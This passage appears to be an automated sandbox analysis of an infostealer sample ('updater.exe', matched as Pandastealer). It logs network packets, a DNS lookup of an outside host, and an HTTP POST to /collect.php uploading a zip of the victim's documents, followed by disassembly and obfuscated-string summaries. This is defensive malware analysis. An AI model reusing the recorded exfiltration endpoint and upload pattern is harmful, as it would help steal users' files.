Jul 4, 2023 11:17:57.802236080 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.803662062 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.803684950 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.803700924 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.803716898 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.803730965 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.803745031 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.803760052 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.803774118 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.803788900 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.803802967 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.803817034 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.803824902 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.803838968 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.803853035 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.803867102 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.803930044 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.804112911 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.804142952 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.804280043 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.804482937 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.804497957 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.804600954 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.804824114 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.804943085 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.804958105 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.805156946 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.805171967 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.805290937 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.805495024 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.805651903 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.805666924 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.805686951 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.805840015 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.806025028 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.806042910 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.806138992 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.806386948 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.806607962 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.806624889 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.806663036 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.806840897 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.806876898 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.807018042 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.807032108 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.807229042 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.807379007 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.807523012 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.807538033 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.807693958 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.807861090 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.808043003 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.808388948 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.808404922 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.808530092 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.808779001 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.808796883 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.808873892 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.809027910 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.809201002 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.809248924 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.809350014 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.809509993 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.809530020 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.809544086 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.809763908 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.809779882 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.809794903 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.809886932 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.810756922 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.810827971 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.810861111 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.810890913 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.810921907 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.810956001 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:58.051028967 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:58.051204920 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:18:28.031232119 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:18:28.035197973 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:18:56.140016079 CEST	49185	80	192.168.2.22	141.8.192.151

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 4, 2023 11:17:55.808142900 CEST	50108	53	192.168.2.22	8.8.8.8
Jul 4, 2023 11:17:55.884426117 CEST	53	50108	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 4, 2023 11:17:55.808142900 CEST	192.168.2.22	8.8.8.8	0xcd88	Standard query (0)	f0837288.xsph.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jul 4, 2023 11:17:55.884426117 CEST	8.8.8.8	192.168.2.22	0xcd88	No error (0)	f0837288.xsph.ru	141.8.192.151	A (IP address)	IN (0x0001)	false
Jul 4, 2023 11:18:05.181360006 CEST	8.8.8.8	192.168.2.22	0xe6b3	No error (0)	windowsupdatebg.s.llnwi.net	178.79.225.0	A (IP address)	IN (0x0001)	false
Jul 4, 2023 11:18:05.181360006 CEST	8.8.8.8	192.168.2.22	0xe6b3	No error (0)	windowsupdatebg.s.llnwi.net	95.140.230.192	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

f0837288.xsph.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49185	141.8.192.151	80	C:\Users\user\Desktop\updater.exe

Timestamp	kBytes transferred	Direction	Data
Jul 4, 2023 11:17:56.079627991 CEST	0	OUT	POST /collect.php HTTP/1.1 Content-Type: multipart/form-data; boundary=SendFileZIPBoundary User-Agent: uploader Host: f0837288.xsph.ru Content-Length: 1638104 Connection: Keep-Alive Cache-Control: no-cache
Jul 4, 2023 11:17:56.079782009 CEST	0	OUT	Data Raw: 2d 2d 53 65 6e 64 46 69 6c 65 5a 49 50 42 6f 75 6e 64 61 72 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 54 6f 55 70 6c 6f 61 64 22 3b 20 66 69 6c 65 6e 61 Data Ascii: --SendFileZIPBoundaryContent-Disposition: form-data; name="fileToUpload"; filename="zipfile.zip"Content-Type: application/zip
Jul 4, 2023 11:17:56.094963074 CEST	2	OUT	Data Raw: 50 4b 03 04 14 00 02 00 08 00 34 5a e4 56 74 f9 e2 4f 84 02 00 00 02 04 00 00 1b 00 11 00 46 69 6c 65 73 2f 41 6c 62 75 73 2f 44 55 55 44 54 55 42 5a 46 57 2e 64 6f 63 78 55 54 0d 00 07 e6 ff a3 64 e6 ff a3 64 e6 ff a3 64 15 93 47 ae 65 21 0c 05 Data Ascii: PK4ZVtOFiles/user/DUUDTUBZFW.docxUTdddGe!-EM_H7E1s2"^9kq'XTF{CklRMljj> :2"5=E`{amXzLw.6z5]axcgnR:ybv]
Jul 4, 2023 11:17:56.249603033 CEST	3	OUT	Data Raw: 73 3b 79 94 cb 87 73 3d e1 8e 01 c5 7c fb ea f8 54 29 ea 23 4f 35 41 3d d1 dd 98 a4 c7 c0 f1 a8 b1 6f a6 92 df 1e 88 ce 1a d0 af 86 dd 15 8b 14 f3 20 c3 de a6 66 3e 99 c2 89 eb 5c 94 96 2d 38 de 2f 62 3f e6 33 ef da 4a f6 37 df 06 df 59 27 b9 eb Data Ascii: s;ys=\|T)#O5A=o f>\-8/b?3J7Y'4u<Ol(5$1bVx+Y']-46WW3VfL%OPK4ZVtOFiles/user/(2) DUUDTUBZFW.docxUTdddGe!-E
Jul 4, 2023 11:17:56.265000105 CEST	6	OUT	Data Raw: 5f 8f aa b5 1c ec 30 fc 4d bc 95 d7 80 fb 29 68 e7 b4 a0 ca cb 86 bb 5b 45 f2 f8 10 52 6f 29 d9 78 54 90 68 80 ed b6 5f b3 92 33 aa 65 76 cf 94 26 dc d4 ea 85 8f 58 95 3e c4 e8 89 a4 a7 aa 03 47 5a 3d d7 8c dd 71 ab b1 b8 51 ac af b3 1f bd 9e cb Data Ascii: _0M)h[ERo)xTh_3ev&X>GZ=qQ{k5^#=xt r4&NtbO}sYja,c(jQ+Ex_@.+Y!cfy~3_z8C1\/GS]p_ez~78BN/\iSfwO`wZs
Jul 4, 2023 11:17:56.424361944 CEST	9	OUT	Data Raw: fd ab 0d 60 f8 75 7a 1d 23 75 ab eb fe da 5e 92 82 37 11 43 d6 f9 d0 9e 71 d9 91 79 0e 47 1d bd 19 2d 14 b1 d0 14 92 e5 d4 98 a5 7e 76 ae 2a b4 71 c2 8a 2a 55 b8 d6 f2 fe f2 4c a7 a6 5e 6e 35 56 3b 56 58 3e 60 bb 1b ba 15 1a 50 e6 e0 5f 45 8c 35 Data Ascii: `uz#u^7CqyG-~vqUL^n5V;VX>`P_E5'q_Zt6s[xaF<:6B7a!ln.IW*nDvs-ZLb}Rm{]wFtKC[HaoB?M,@F18s\|z
Jul 4, 2023 11:17:56.434906960 CEST	14	OUT	Data Raw: 3c da ec e1 08 ed 6f 4a 32 c5 5e 5a 0a e5 ca 7a 0d 05 70 b9 4b 4b 29 8b 50 e6 c8 ae a4 89 d7 0a 26 5c 62 e2 47 9c 77 f2 09 bd 38 e2 5f 8b 58 36 af c9 10 04 f7 16 78 cb 62 ef 56 4d 97 e4 17 fe 16 e7 f6 a2 c5 82 6e 28 df 5b 0b e1 49 47 b9 cd 06 3d Data Ascii: <oJ2^ZzpKK)P&\bGw8_X6xbVMn([IG=oU:+[$DG8ppo8@J?x<kgpR=`<M5).~9/yhHp=m+7XGaD",am8V5
Jul 4, 2023 11:17:56.594460011 CEST	19	OUT	Data Raw: d9 94 7f 0b eb ad 31 12 fb c6 cb b8 6f 3a 03 33 bf 62 28 39 b9 23 1c a8 d5 c4 6d b3 50 68 d2 ae fe a7 1b c3 ee 74 a4 b6 ea 66 cb 14 60 5f 91 bb 51 e4 6b 96 ac 26 c2 bd 0c fd fb af 8e 6d 21 09 6b 9d bf ab ef c6 79 57 0f 73 23 13 61 df 7f b6 2b 11 Data Ascii: 1o:3b(9#mPhtf`_Qk&m!kyWs#a+&Jfrx%P<vgn@-O^?2N`$I[da3B}v(d0mGf-we+_<%-}`t}
Jul 4, 2023 11:17:56.604887009 CEST	29	OUT	Data Raw: 98 29 c6 5e 73 24 70 86 3e 8d ee 6f 09 51 e8 04 a5 44 ef ad e6 cd 07 14 a1 fb 51 f0 b7 b5 1d 15 13 8c 47 21 f7 41 73 10 2d 02 61 a8 dd a1 a1 f0 78 6c f8 19 d5 11 8f 82 13 96 09 e3 1e b4 81 7b f7 45 3f ed f2 ce 97 9a 51 c6 fd 01 e7 45 ab dc 5f 2e Data Ascii: )^s$p>oQDQG!As-axl{E?QE_.}" t&Qr2}qhP@c1/<Z)ZdW==`I,.]Q1rsrhFTvmW%-#w75Xj\|sl^RHhvUI\|
Jul 4, 2023 11:17:56.764790058 CEST	39	OUT	Data Raw: fa f1 3b 98 bc f6 ec 4c 83 00 cd d5 3f 6d 90 17 bc 3c bf 49 dc c9 10 e2 16 c6 d1 aa 73 19 ec bd de cc 41 bd 35 c4 57 0c 69 af 19 c5 b0 a1 21 07 8f cd 5d e4 5d 1d 77 c9 8e 7a af 2e 3f c1 54 c5 d8 f0 e8 ad 1d aa c0 d5 8c dc e7 2b 8d a9 ab 1d 64 5e Data Ascii: ;L?m<IsA5Wi!]]wz.?T+d^u^8`-Kjf0#mhvz)_I!?;pV`"*D{ojryz+1c_M00>3Zrzi4FJc}OS21&f6
Jul 4, 2023 11:17:56.775048971 CEST	52	OUT	Data Raw: 3e 8b b4 a9 32 33 46 da 6b a9 70 e3 b2 31 7b 3c 71 93 cf 4a 45 35 34 56 d9 02 f4 bd 15 51 2d 19 00 53 9b 10 6a 53 4e ff 97 85 fc 39 5b 49 68 0d 16 78 64 2d 17 0f 66 3c 40 28 95 23 d6 b7 07 dd d0 20 dc 2e 01 93 9d 14 53 83 22 af 6e d2 ab 55 b8 2f Data Ascii: >23Fkp1{<qJE54VQ-SjSN9[Ihxd-f<@(# .S"nU/>q~VkYD1):<XeI@0U7ZM SvVGM?)"&>DsJEcfVoOlNid1nwnw[q,
Jul 4, 2023 11:17:58.051028967 CEST	1636	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 04 Jul 2023 09:17:57 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Target ID:	1
Start time:	11:17:58
Start date:	04/07/2023
Path:	C:\Users\user\Desktop\updater.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\updater.exe
Imagebase:	0x13b0000
File size:	698'280 bytes
MD5 hash:	5B7111AE32C04C641C56E81A6293EC48
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Pandastealer_8b333e76, Description: unknown, Source: 00000001.00000000.988088444.0000000001437000.00000002.00000001.01000000.00000003.sdmp, Author: unknown Rule: Windows_Trojan_Pandastealer_8b333e76, Description: unknown, Source: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	12.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	61

Executed Functions

Function 013B3507 Relevance: 49.4, APIs: 23, Strings: 5, Instructions: 360
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(014552C4), ref: 013B3591
GetProcAddress.KERNEL32(00000000,00000000,?,00000008), ref: 013B35BB
LoadLibraryA.KERNEL32(01455268), ref: 013B3644
GetProcAddress.KERNEL32(00000000,00000000,?,00000008), ref: 013B365E
GetProcAddress.KERNEL32(00000000,00000000,?,00000008), ref: 013B367D
GetProcAddress.KERNEL32(00000000,00000000,?,00000008), ref: 013B369C
LoadLibraryA.KERNEL32(0145508C), ref: 013B3737
GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013B376D
GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013B3787
GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013B37A1
GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013B37C5
LoadLibraryA.KERNEL32(01454D40), ref: 013B3867
GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013B389D
GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013B38B7
GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013B38D1
GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013B38F5
GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013B390F
GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013B3929
GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013B37E9

Part of subcall function 0140DB47: EnterCriticalSection.KERNEL32(01453CAC,69494B7C,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB51
Part of subcall function 0140DB47: LeaveCriticalSection.KERNEL32(01453CAC,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB84
Part of subcall function 0140DB47: RtlWakeAllConditionVariable.NTDLL ref: 0140DBFB

GetProcAddress.KERNEL32(00000000,00000000,?,00000008), ref: 013B36B1

Part of subcall function 0140DB91: EnterCriticalSection.KERNEL32(01453CAC,?,7369FFF6,?,013B416B,014554D0,00000000), ref: 0140DB9C
Part of subcall function 0140DB91: LeaveCriticalSection.KERNEL32(01453CAC,?,013B416B,014554D0,00000000), ref: 0140DBD9

LoadLibraryA.KERNEL32(0145543C), ref: 013B39A7
GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013B39CF
GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013B39E9

Strings

., xrefs: 013B394A
LM\W^Z, xrefs: 013B3603
JBB., xrefs: 013B352D
B., xrefs: 013B3803
., xrefs: 013B35DE

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$CriticalSection$EnterLeave$ConditionVariableWake
String ID: .$.$B.$JBB.$LM\W^Z
API String ID: 750888802-2939352088
Opcode ID: dfa602d174fa0fd23037ba2d8d1520586cd0f549e5db327d60a86a1b4678ba09
Instruction ID: ea7f6d9f83d1431182ec87f0ba3f79190c060d57e62e13a0b6826ac93fabf8bc
Opcode Fuzzy Hash: dfa602d174fa0fd23037ba2d8d1520586cd0f549e5db327d60a86a1b4678ba09
Instruction Fuzzy Hash: 4CD114759043919EDB21EFB9D8C45ADBFB1BB11214B29002EE6419FAB7FB70C884CB51

Uniqueness

Uniqueness Score: -1.00%

Function 013C7009 Relevance: 33.3, Strings: 25, Instructions: 2051COMMON

Download Yara Rule

Strings

] - [user: , xrefs: 013C7B8E, 013C8C57
secure, xrefs: 013C7337
[+] data unpacked, xrefs: 013C88EE
sqMAAEGK], xrefs: 013C867C
CLK\, xrefs: 013C7934
]KM[\K, xrefs: 013C8565
NULL,secure, xrefs: 013C71B3
cATGBBO., xrefs: 013C7E78
., xrefs: 013C7941
ru, xrefs: 013C86FF
., xrefs: 013C8705
Mozilla, xrefs: 013C70E6
[-] data unpacked failed, xrefs: 013C8EBA
., xrefs: 013C8BE7
., xrefs: 013C7503
., xrefs: 013C8536
MEKJ, xrefs: 013C7836
is_secure, xrefs: 013C707F, 013C708A, 013C70B0
FALSE, xrefs: 013C81E9
., xrefs: 013C7741
$., xrefs: 013C7840
C, xrefs: 013C87D0
[@^O, xrefs: 013C782C
., xrefs: 013C8B70
., xrefs: 013C8A53

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalDeallocateSection$EnterLeave__fread_nolock
String ID: $.$.$.$.$.$.$.$.$.$C$CLK\$FALSE$MEKJ$Mozilla$NULL,secure$[+] data unpacked$[-] data unpacked failed$[@^O$] - [user: $]KM[\K$cATGBBO.$is_secure$ru$secure$sqMAAEGK]
API String ID: 1177441120-1452042179
Opcode ID: 573e2ee1bd7bf1bffb8f899d7554ad3e36a0b6a7451a236b1a3fbc32ab910aa9
Instruction ID: 90086ece472dedea7b2ff208012c61dc1e0de122adfd884c1fe87ee5008d7d1f
Opcode Fuzzy Hash: 573e2ee1bd7bf1bffb8f899d7554ad3e36a0b6a7451a236b1a3fbc32ab910aa9
Instruction Fuzzy Hash: 4313D430D0429ADEDB15EBA8C844BEDBBB0BF65708F2041AED4456B1A2DB705F89CF51

Uniqueness

Uniqueness Score: -1.00%

Function 013C3E7B Relevance: 28.5, APIs: 2, Strings: 13, Instructions: 2285COMMON

Download Yara Rule

APIs

Part of subcall function 01412C70: QueryPerformanceCounter.KERNEL32(?), ref: 01412C8B

GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 013C3EE2
GetModuleFileNameA.KERNEL32(00000000), ref: 013C3EE9

Part of subcall function 0140DB91: EnterCriticalSection.KERNEL32(01453CAC,?,7369FFF6,?,013B416B,014554D0,00000000), ref: 0140DB9C
Part of subcall function 0140DB91: LeaveCriticalSection.KERNEL32(01453CAC,?,013B416B,014554D0,00000000), ref: 0140DBD9

Part of subcall function 0140DB47: EnterCriticalSection.KERNEL32(01453CAC,69494B7C,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB51
Part of subcall function 0140DB47: LeaveCriticalSection.KERNEL32(01453CAC,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB84
Part of subcall function 0140DB47: RtlWakeAllConditionVariable.NTDLL ref: 0140DBFB

Part of subcall function 013CDF41: _Deallocate.LIBCONCRT ref: 013CDF50

Strings

., xrefs: 013C3F97
~, xrefs: 013C5C7C
kmz{, xrefs: 013C3F8A
), xrefs: 013C55AA
mac~{zk|`ock., xrefs: 013C4040
hGBK, xrefs: 013C4812
tMO], xrefs: 013C49AF
sec., xrefs: 013C5C90
@traffer, xrefs: 013C54B5
., xrefs: 013C4FE1
mO\J, xrefs: 013C4E34
|k, xrefs: 013C3F91
}ZKO, xrefs: 013C43A4

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeaveModule$ConditionCounterDeallocateFileHandleNamePerformanceQueryVariableWake
String ID: sec.$)$.$.$@traffer$hGBK$kmz{$mO\J$mac~{zk|`ock.$tMO]$|k$}ZKO$~
API String ID: 3852128730-2062050558
Opcode ID: e9b0ce1728aa425b80774e83ea240e44be02fba97e98b86f7395951651a9a0ff
Instruction ID: c4821a5ae8c7ab38acc03833f7db623f60e95e81ba1bd3582a2c7779f27d1936
Opcode Fuzzy Hash: e9b0ce1728aa425b80774e83ea240e44be02fba97e98b86f7395951651a9a0ff
Instruction Fuzzy Hash: 19231830D042969FDB15EBA8D854BEDBBB0AF65704F2440EED4486B1A2EB745F88CF41

Uniqueness

Uniqueness Score: -1.00%

Function 013BB653 Relevance: 25.9, Strings: 20, Instructions: 924
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

~A\Z, xrefs: 013BBCA6
., xrefs: 013BBAA9
., xrefs: 013BBFAC
{]K\, xrefs: 013BBEB6
fA]Z, xrefs: 013BBA96
., xrefs: 013BBCB9
O@OI, xrefs: 013BB71D
~O]], xrefs: 013BC0D2
., xrefs: 013BB8EF
., xrefs: 013BB731
LO]K, xrefs: 013BBF9E
., xrefs: 013BBB86
., xrefs: 013BC32E
CB, xrefs: 013BB72B
., xrefs: 013BBEC9
., xrefs: 013BB979
&, xrefs: 013BC3F8
hGBKtGBBOr, xrefs: 013BC353
., xrefs: 013BBD96
., xrefs: 013BC0E5

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionDeallocateVariableWake
String ID: &$.$.$.$.$.$.$.$.$.$.$.$CB$LO]K$O@OI$fA]Z$hGBKtGBBOr${]K\$~A\Z$~O]]
API String ID: 1208101283-3398088302
Opcode ID: f2b1d937b83569bc347602145afde050436cdf81aced45ec52ec5ab78e0977c2
Instruction ID: 6eed3d1b2ffbbce10888ca80964f463e613cb3311b5234c4ea9a54d1f4ce33a8
Opcode Fuzzy Hash: f2b1d937b83569bc347602145afde050436cdf81aced45ec52ec5ab78e0977c2
Instruction Fuzzy Hash: 53820B70D04286DFDB25EBA8C884BEDFBB0AF21714F2441AED5456B1A2DB705E48CF51

Uniqueness

Uniqueness Score: -1.00%

Function 013C1BD6 Relevance: 24.5, Strings: 19, Instructions: 717
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

., xrefs: 013C215A
~O]], xrefs: 013C2364
., xrefs: 013C1D67
., xrefs: 013C2595
]YA\, xrefs: 013C2225
AZAM, xrefs: 013C1E97
`OCK, xrefs: 013C214D
., xrefs: 013C1DFC
~\AZ, xrefs: 013C1F3A
]]YA, xrefs: 013C22CA
AMAB, xrefs: 013C1F41
dOLLK\r., xrefs: 013C2622
., xrefs: 013C2020
., xrefs: 013C2232
B., xrefs: 013C1C0E
ZAMA, xrefs: 013C1D5A
., xrefs: 013C1F4E
ZAMA, xrefs: 013C1DEF
., xrefs: 013C2371

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionVariableWake
String ID: .$.$.$.$.$.$.$.$AMAB$AZAM$B.$ZAMA$ZAMA$]YA\$]]YA$`OCK$dOLLK\r.$~O]]$~\AZ
API String ID: 2013694253-1663802069
Opcode ID: dd301688c129b2f13036f4dbf0a4c1624ddca9aad7f76dc6ff9a8fcfea1a89b3
Instruction ID: a1a33f88044547731511bac210ca5f4f4d0eb9f58429ecaa7f3acc4d78c3a12a
